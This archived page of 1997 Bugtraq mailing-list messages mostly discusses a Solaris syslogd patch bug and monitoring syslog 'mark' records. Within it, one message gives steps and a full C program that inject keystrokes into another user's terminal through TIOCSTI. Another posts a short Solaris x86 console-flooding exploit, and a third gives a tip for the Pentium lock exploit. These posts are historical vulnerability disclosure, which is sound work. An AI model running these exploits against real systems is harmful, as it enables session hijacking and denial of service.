The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


solaris 251 & syslogd


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
SUNReturn-Path: <[email protected]>
Delivered-To: [email protected]
From: Dave Kinchlea <[email protected]>
Subject:      Re: solaris 251 & syslogd
X-To:         Michael Helm <[email protected]>
To: [email protected]
In-Reply-To:  <[email protected]>
Status:   
X-PMFLAGS: 34078848 0

A small point but, with use of the `mark' facility in syslog, and proper
monitoring for it, you can and should be able to detect syslogd either
dying or refusing to write to files (amounts to the same thing). No news
is NOT good news, but knowing that we can key on it.

This is not intended to say that what you found is not a bug, just that
there is a way to detect it.

cheers, kinch

On Wed, 12 Nov 1997, Michael Helm wrote:

> I'm not having very good luck with the patch mentioned here
> (among other places) for syslogd on solaris.  Patch 103738-05
> may solve the immediate security problem, but at least for me,
> as soon as you attempt to restart it (SIGHUP), it stops writing
> messages to any of its files.  This is usually done automatically
> by scripts that close old log files & open new (empty) ones;
> they stay empty.  Unless you go looking for this, you will not
> notice it for a while (swatch or your other monitors will be
> happy &c).  No news is not good news in this case ; I see this
> as a pretty big security problem in its own right.
>
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: (qmail 24992 invoked from network); 13 Nov 1997 03:16:33 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 13 Nov 1997 03:16:33 -0000
Received: by scylla.sovam.com id AA27281
  (5.67b8s3p1/IDA-1.5 for [email protected]); Thu, 13 Nov 1997 03:55:28 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA27247
  (5.67b8s3p1/IDA-1.5 for <[email protected]>); Thu, 13 Nov 1997 03:53:00 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
	by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id FAA08488
	for <[email protected]>; Thu, 13 Nov 1997 05:52:01 +0500 (ES)
Received: from [email protected] (port 12859 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <69640-14078>; Wed, 12 Nov 1997 16:20:49 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5588495 for [email protected]; Wed, 12 Nov 1997 16:19:43
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          QAA16672 for <[email protected]>; Wed, 12 Nov 1997 16:07:48 -0500
Received: from [email protected] (port 12859 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <1846-14078>; Wed, 12 Nov 1997
          16:07:40 -0500
Approved-By: [email protected]
Received: from lucy.berkeley.edu. (lucy.Berkeley.EDU [169.229.31.2]) by
          netspace.org (8.8.7/8.8.2) with SMTP id MAA17518 for
          <[email protected]>; Wed, 12 Nov 1997 12:49:20 -0500
Received: from aslan.hip.berkeley.edu by lucy.berkeley.edu. (SMI-8.6/SMI-SVR4)
          id JAA12652; Wed, 12 Nov 1997 09:35:43 -0800
Mime-Version: 1.0
Content-Type:  text/plain; charset=US-ASCII
X-Mailer: Eudora Pro 3.0.1
Content-Transfer-Encoding: 7BIT
X-Mime-Autoconverted: from quoted-printable to 8bit by netspace.org id MAA17532
Message-Id: <[email protected]>
Date: 	Wed, 12 Nov 1997 09:49:01 -0800
Reply-To: Richard Peters <[email protected]>
Sender: Bugtraq List <[email protected]>
From: Richard Peters <[email protected]>
Subject:      Re: solaris 251 & syslogd
To: [email protected]
In-Reply-To:  <[email protected]>
Status:   
X-PMFLAGS: 34078848 0

I experienced the same problem with this 103738-05 patch and reverted to
103738-03 with which I have had not experienced the HUP problem.  However,
on the track of missing messages being a security problem, Solaris log
processing does occasionally drop messages into the trash bin, especially
when lots of messages are being processed. Not a good "feature".  ..Richard
Peters

At 8:42 AM -0800 11/12/97, Michael Helm wrote:
>I'm not having very good luck with the patch mentioned here
>(among other places) for syslogd on solaris.  Patch 103738-05
>may solve the immediate security problem, but at least for me,
>as soon as you attempt to restart it (SIGHUP), it stops writing
>messages to any of its files.  This is usually done automatically
>by scripts that close old log files & open new (empty) ones;
>they stay empty.  Unless you go looking for this, you will not
>notice it for a while (swatch or your other monitors will be
>happy &c).  No news is not good news in this case ; I see this
>as a pretty big security problem in its own right.
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: (qmail 2045 invoked from network); 15 Nov 1997 01:02:07 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 15 Nov 1997 01:02:07 -0000
Received: by scylla.sovam.com id AA27699
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sat, 15 Nov 1997 03:57:36 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA27683
  (5.67b8s3p1/IDA-1.5 for <[email protected]>); Sat, 15 Nov 1997 03:55:19 +0300
Received: from plum.cyber.com.au (plum.cyber.com.au [203.7.155.24])
	by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id FAA20782
	for <[email protected]>; Sat, 15 Nov 1997 05:54:44 +0500 (ES)
Received: (from slist@localhost)
	by plum.cyber.com.au (8.8.6/8.8.6) id LAA12910;
	Sat, 15 Nov 1997 11:42:38 +1100 (EST)
Resent-Date: Sat, 15 Nov 1997 11:42:38 +1100 (EST)
Delivered-To: [email protected]
Message-Id: <[email protected]>
Date: 	Fri, 24 Oct 1997 17:47:16 -0600
Reply-To: Theo de Raadt <[email protected]>
Sender: [email protected]
From: Theo de Raadt <[email protected]>
In-Reply-To:  Your message of "Thu, 23 Oct 1997 10:05:27 CDT." 
              <[email protected]>
Old-X-Originally-To: To: [email protected]
Old-X-Originated-From: From: Theo de Raadt <[email protected]>
Resent-Message-Id: <"OfV30B.A.E-C.1aHb0"@plum>
X-Loop: [email protected]
Errors-To: [email protected]
Precedence: list
Resent-Sender: [email protected]
To: [email protected]
Resent-From: [email protected]
X-Mailing-List: <[email protected]> ftp://ftp.cyber.com.au/pub/archive/b-o-s/
X-Subscription: To unsubscribe from this fine mailing list mail [email protected] with Subject: unsubscribe
Subject: BoS:      Re: Possible SERIOUS bug in open()?
Status:   
X-PMFLAGS: 33554560 0


> This is a variant of a bug Theo de Raadt found in SunOS back in the 1980s.
> The basic issue is that the code that guards access to the device-specific
> open() routine checks explicitly for FREAD, FWRITE, and O_TRUNC, and
> passes the call through if none of these are set. Theo's bug involved
> using "3" for the open() flag.

The bug worked in SunOS 4.0 and 4.1, and if I remember correctly it
was fixed in 4.1.3.  What you basically did was this:

- lose your tty association
- open the console device you want to attack (ie. say, root is
  logged into the console)
- fd = open("/dev/console", 3); close(fd);
- now you have just gained tty association.
- fd = open("/dev/tty", O_RDWR).  This is the same as having opened
  /dev/console, but this time I have permission to read & write.
- ioctl(fd, TIOCSTI, &c) ...

Of course, TIOCSTI simulates console input.

That this basic bug is still around is pretty dissapointing.  I
reported the bug to Sun, but I guess they never told anyone else about
it, and hence it did not get fixed in the standard BSD code.

I'm a little dissapointed in myself for not having looked to see if
this bug still existed.  Of course, the routed problems still exist
too, and that bug is about as old. I fixed it in OpenBSD yesterday.

Any vn_open() with FREAD|FWRITE == 0 fails with EINVAL.

here's the program I wrote a VERY VERY long time ago.  (Neato, it has
some little buffer overflows in it ;-)

----------------------------------------

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/signal.h>
#include <sys/file.h>
#include <stdio.h>

#define ECHAR ((unsigned char)0x1d)

unsigned char tty[80];
int fd, p[2];;
int v = 1, sc = 1;

/* ----------------------------------------------------------------------
 * MAIN:
 * ------------------------------------------------------------------- */
main(argc, argv)
int argc;
char **argv;
{
    int i, j, x;
    unsigned char c;

    if( argc<2 ) {
        fprintf(stderr, "Usage: %s [-v] tty\n", argv[0]);
        exit(0);
    }

    if( !strcmp(argv[1], "-v") ) {
        sprintf(tty, "/dev/%s", argv[2]);
        v = 1;
    } else sprintf(tty, "/dev/%s", argv[1]);

    printf("The escape character is ^]\n");
    status(0);

    pipe(p);
    if( fork() == 0) {
        close(p[1]);

        x = getpgrp(0);
        signal(SIGTTIN, SIG_IGN);
        signal(SIGTTOU, SIG_IGN);

        ioctl(open("/dev/tty",0), TIOCNOTTY, 0);
        if( open(tty, 3) <0)
            open(tty, O_WRONLY);
        fd = open("/dev/tty", 2);
        setpgrp(0,x);

        while(1) {
            x = read(p[0], &c, 1);
            if(x==1) ioctl(fd, TIOCSTI, &c);
            if(x==0) exit();
        }

    } else {
        close(p[0]);                                            /* me */
        echo(0);

        while( read(0, &c, 1) == 1) {
            c &= 0x7f;          /* kill parity bit */
            if(c==ECHAR) {
                if( read(0, &c, 1) == 1) switch( c&0x7f ) {
                    case 'q':
                    case 'Q':   die();
                                break;
                    case 'c':
                    case 'C':   sc = !sc;
                                status(1);
                                break;
                    case 'v':
                    case 'V':   v = !v;
                                status(1);
                                break;
                    case 's':
                    case 'S':   status(1);
                                break;
                    case '?':
                    case 'h':
                    case 'H':   status(1);
                                printf("\n\r? - this screen\n\r");
                                printf("q - quit\n\r");
                                printf("v - verbose\n\r");
                                printf("c - control characters\n\r");
                                printf("s - status\n\r");
                                break;
                    default:    send(ECHAR);
                                send(c);
                                break;
                    }
                else die();
            } else send(c);
        }
        die();
    }
}

/* ----------------------------------------------------------------------
 * SEND:
 * ------------------------------------------------------------------- */
send(c)
unsigned char c;
{
    unsigned char c2;

    c &= 0x7f;
    write(p[1], &c, 1);
    if(v) {
        if( c==' ' || c=='\t' ) {               /* tab and space */
            write(1, &c, 1);
        } else if( c=='\r' || c=='\n' ) {       /* return */
            write(1, "\r\n", 2);
        } else if( c<' ' ) {                    /* control characters */
            if(sc) {
                write(1, "^", 1);
                c2 = c & 0x7f | 0x40;
                write(1, &c2, 1);
            }
        } else {                                /* normal characters */
            write(1, &c, 1);
        }
    }
}

/* ----------------------------------------------------------------------
 * ECHO:
 * ------------------------------------------------------------------- */
echo(n)
int n;
{
    struct sgttyb ttyb;

    ioctl(0, TIOCGETP, &ttyb);
    if(n) ttyb.sg_flags = (ttyb.sg_flags | ECHO) & ~RAW;
    else ttyb.sg_flags = (ttyb.sg_flags & ~ECHO) | RAW;
    ioctl(1, TIOCSETP, &ttyb);
}

/* ----------------------------------------------------------------------
 * DIE:
 * ------------------------------------------------------------------- */
die()
{
    echo(1);
    exit(0);
}

status(x)
int x;
{
    if(x) printf("\n\r");
    printf("verbose:%d control:%d\n\r", v, sc);
}


Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: (qmail 23273 invoked from network); 16 Nov 1997 01:01:36 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 16 Nov 1997 01:01:36 -0000
Received: by scylla.sovam.com id AA26008
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sun, 16 Nov 1997 00:23:19 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA25993
  (5.67b8s3p1/IDA-1.5 for <[email protected]>); Sun, 16 Nov 1997 00:22:14 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
	by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id CAA08733
	for <[email protected]>; Sun, 16 Nov 1997 02:21:47 +0500 (ES)
Received: from [email protected] (port 23568 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96937-27738>; Sat, 15 Nov 1997 15:17:22 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5662148 for [email protected]; Sat, 15 Nov 1997 15:16:20
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          PAA31265 for <[email protected]>; Sat, 15 Nov 1997 15:15:01 -0500
Received: from [email protected] (port 23568 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <97183-27738>; Sat, 15 Nov 1997
          15:14:55 -0500
Approved-By: [email protected]
Received: from kinch.ark.com (kinch.ark.com [207.107.168.217]) by netspace.org
          (8.8.7/8.8.2) with ESMTP id OAA24194 for <[email protected]>; Sat,
          15 Nov 1997 14:14:51 -0500
X-Sender: [email protected]
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <[email protected]>
Date: 	Sat, 15 Nov 1997 11:12:21 -0800
Reply-To: Dave Kinchlea <[email protected]>
Sender: Bugtraq List <[email protected]>
From: Dave Kinchlea <[email protected]>
Subject:      Re: solaris 251 & syslogd
X-To:         M Shariful Anam <[email protected]>
To: [email protected]
In-Reply-To:  <[email protected]>
Status:   
X-PMFLAGS: 34078848 0

On Sat, 15 Nov 1997, M Shariful Anam wrote:

> On Wed, 12 Nov 1997, Dave Kinchlea wrote:
> | A small point but, with use of the `mark' facility in syslog, and proper
> | monitoring for it, you can and should be able to detect syslogd either
> | dying or refusing to write to files (amounts to the same thing). No ne
>
> hmm.. would you like to illustrate a bit more on it? man page on
> syslog.conf doesn't say much.

Sure
        With most (all?) syslogd implementations, there is an internal
facility called `mark'. While I am sure that the actual details of the
mark facility vary from one implementation to another, generally it is
used by syslogd to send a time stamp to the specified file and/or server
at specified time intervals (usually modifiable via command line args) as
long as no other syslog output has been generated since the last MARK.

        Assuming you have some real-time monitoring of syslog output, all
you need to do is adjust the monitoring so that you expect to see *some*
output within a specified time, if regular syslog traffic doesn't generate
any (ie: during a slow time), the `mark' facility will. When you do not
receive any output within the specified time, syslogd is down (or perhaps
the loghost and/or network is, in any case time to look into it).

        The `trick' here is to remember that many (all?) syslogd
implementations do NOT include the `mark' facility in wildcards. So,

        *.debug                 @sysloghost

in /etc/syslog.conf does NOT forward any mark records. You must include it
specifically:

        *.debug;mark.*          @sysloghost


>
> Also, logging to the console could be one solution.

Doesn't scale well and it requires humans to do the monitoring. No, this
really isn't a good answer for those who truly need the logging, there is
just no way to automate it. Besides, many of us use a single screen as
console for many different servers.

cheers, kinch
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: (qmail 27232 invoked from network); 16 Nov 1997 05:31:35 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 16 Nov 1997 05:31:35 -0000
Received: by scylla.sovam.com id AA12065
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sun, 16 Nov 1997 06:32:20 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA11970
  (5.67b8s3p1/IDA-1.5 for <[email protected]>); Sun, 16 Nov 1997 06:30:20 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
	by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id IAA10889
	for <[email protected]>; Sun, 16 Nov 1997 08:29:59 +0500 (ES)
Received: from [email protected] (port 14944 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97220-29936>; Sat, 15 Nov 1997 21:04:33 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5670340 for [email protected]; Sat, 15 Nov 1997 21:03:02
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          VAA04720 for <[email protected]>; Sat, 15 Nov 1997 21:02:39 -0500
Received: from [email protected] (port 14944 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <97483-29936>; Sat, 15 Nov 1997
          21:02:31 -0500
Approved-By: [email protected]
Received: from mystic.false.com (false.com [198.65.171.171]) by netspace.org
          (8.8.7/8.8.2) with ESMTP id TAA28189 for <[email protected]>; Sat,
          15 Nov 1997 19:19:53 -0500
Received: from false.com ([email protected] [198.65.171.171]) by
          mystic.false.com (8.8.5/8.8.2) with ESMTP id SAA17017 for
          <[email protected]>; Sat, 15 Nov 1997 18:21:56 -0600
Received: (from solar@localhost) by false.com (8.8.5/8.8.5) id DAA00793 for
          [email protected]; Sun, 16 Nov 1997 03:25:21 -0300
X-Mailer: ELM [version 2.4 PL25]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <[email protected]>
Date: 	Sun, 16 Nov 1997 03:25:20 -0300
Reply-To: Solar Designer <[email protected]>
Sender: Bugtraq List <[email protected]>
From: Solar Designer <[email protected]>
Subject:      Solaris x86 & ICEBP
To: [email protected]
Status:   
X-PMFLAGS: 34078848 0

Hello,

This Pentium bug workaround discussion reminded me of a minor Solaris x86
bug I found half a year ago (tested on Solaris 2.5).

When a program executes the originally undocumented ICEBP instruction, the
kernel reports an 'Unexpected INT 1', and the program continues running.
With default syslogd configuration, this allows flooding the console, and
no information about which process is doing this is reported.

Here's the exploit (put in a .s file):

.globl main
main:
.byte 0xf1
jmp main

Signed,
Solar Designer
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: (qmail 30392 invoked from network); 18 Nov 1997 01:02:02 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 18 Nov 1997 01:02:02 -0000
Received: by scylla.sovam.com id AA13217
  (5.67b8s3p1/IDA-1.5 for [email protected]); Tue, 18 Nov 1997 01:06:42 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA13157
  (5.67b8s3p1/IDA-1.5 for <[email protected]>); Tue, 18 Nov 1997 01:05:00 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
	by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id DAA15833
	for <[email protected]>; Tue, 18 Nov 1997 03:04:44 +0500 (ES)
Received: from [email protected] (port 9531 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97653-9534>; Mon, 17 Nov 1997 12:51:57 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5691932 for [email protected]; Mon, 17 Nov 1997 12:51:23
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          MAA06123 for <[email protected]>; Mon, 17 Nov 1997 12:50:13 -0500
Received: from [email protected] (port 9531 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <97296-9532>; Mon, 17 Nov 1997
          12:50:14 -0500
Approved-By: [email protected]
Received: from fionn.es.net (fionn.es.net [198.128.1.30]) by netspace.org
          (8.8.7/8.8.2) with ESMTP id RAA15110 for <[email protected]>; Sat,
          15 Nov 1997 17:14:44 -0500
Received: from fionn.es.net (localhost [127.0.0.1]) by fionn.es.net
          (LBNLMWH11/LBNLMWH09/ESOCF2) with ESMTP id OAA08975 for
          <[email protected]>; Sat, 15 Nov 1997 14:14:43 -0800 (PST)
Message-Id: <[email protected]>
Date: 	Sat, 15 Nov 1997 14:14:42 -0800
Reply-To: [email protected]
Sender: Bugtraq List <[email protected]>
From: Michael Helm <[email protected]>
Subject:      Re: solaris 251 & syslogd
To: [email protected]
In-Reply-To:  Your message of "Sat, 15 Nov 1997 11:12:21 PST." 
              <[email protected]>
Status:   
X-PMFLAGS: 33554560 0

Dave Kinchlea writes:
>         Assuming you have some real-time monitoring of syslog output, all
> you need to do is adjust the monitoring so that you expect to see *some*

This is good advice.  But....

I guess this is more of a "RISK" albeit a small one rather than a
security issue or BUGTRAQ-worthy bug, but most syslog monitors,
most monitors of every kind, look for events --
not non-events.  I'm not sure how I could get swatch to look
for the absence of mark messages.  I'm sure we could all think
of other circumstances when we'd like to know when something
wasn't happening, but the facility to do so wasn't there
(the mail hub stops accepting mail, the terminal server
stops accepting connections &c).  Something to think about
when designing a system.
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: (qmail 15118 invoked from network); 22 Nov 1997 03:16:32 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 22 Nov 1997 03:16:32 -0000
Received: by scylla.sovam.com id AA13068
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sat, 22 Nov 1997 05:22:31 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA13062
  (5.67b8s3p1/IDA-1.5 for <[email protected]>); Sat, 22 Nov 1997 05:21:23 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
	by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id HAA07913
	for <[email protected]>; Sat, 22 Nov 1997 07:18:47 +0500 (ES)
Received: from [email protected] (port 64837 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <69989-11254>; Fri, 21 Nov 1997 20:05:53 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5797269 for [email protected]; Fri, 21 Nov 1997 19:59:33
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          TAA05024 for <[email protected]>; Fri, 21 Nov 1997 19:49:12 -0500
Received: from [email protected] (port 64837 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <96046-11252>; Fri, 21 Nov 1997
          19:48:05 -0500
Approved-By: [email protected]
Received: from ganymede.or.intel.com (ganymede.or.intel.com [134.134.248.3]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id RAA32501 for
          <[email protected]>; Fri, 21 Nov 1997 17:03:02 -0500
Received: from relay.jf.intel.com (relay.jf.intel.com [134.134.131.6]) by
          ganymede.or.intel.com (8.8.6/8.8.5) with ESMTP id NAA26442 for
          <[email protected]>; Fri, 21 Nov 1997 13:32:31 -0800 (PST)
Received: (from ccmgate@localhost) by relay.jf.intel.com (8.7.6/8.7.3) id
          NAA22885 for [email protected]; Fri, 21 Nov 1997 13:20:33 -0800
          (PST)
Received: by ccm.hf.intel.com (ccmgate 3.2 #8) Fri, 21 Nov 97 13:20:33 PST
Illegal-Object: Syntax error in Message-ID: value found on
                brimstone.netspace.org: Message-ID: <Fri ^   ^-illegal end of
                message identification \-Extraneous program text
Message-Id: <[email protected]>
Date: 	Fri, 21 Nov 1997 13:17:00 PST
Reply-To: AnthonyX Eufemio <[email protected]>
Sender: Bugtraq List <[email protected]>
From: AnthonyX Eufemio <[email protected]>
Subject:      Intel Pentium Bug on System V
To: [email protected]
Status:   
X-PMFLAGS: 33554560 0

In order for the exploit to work on most SystemV systems running on P5
x86 you have to do a sync system call first then execute the lock code.
I have tested it on SCO UnixWare 1.x, 2.x, and SCO OpenServer 5.x and it
will NOT work if you don't do a sync syscall first.

Patches are available in kernel loadable module format from the vendor.

Regards,
A E

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Anthony Eufemio
UNIX Systems Engineer
Intel Corporation
Santa Clara, CA 95052
[email protected]
(408) 765-5452
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру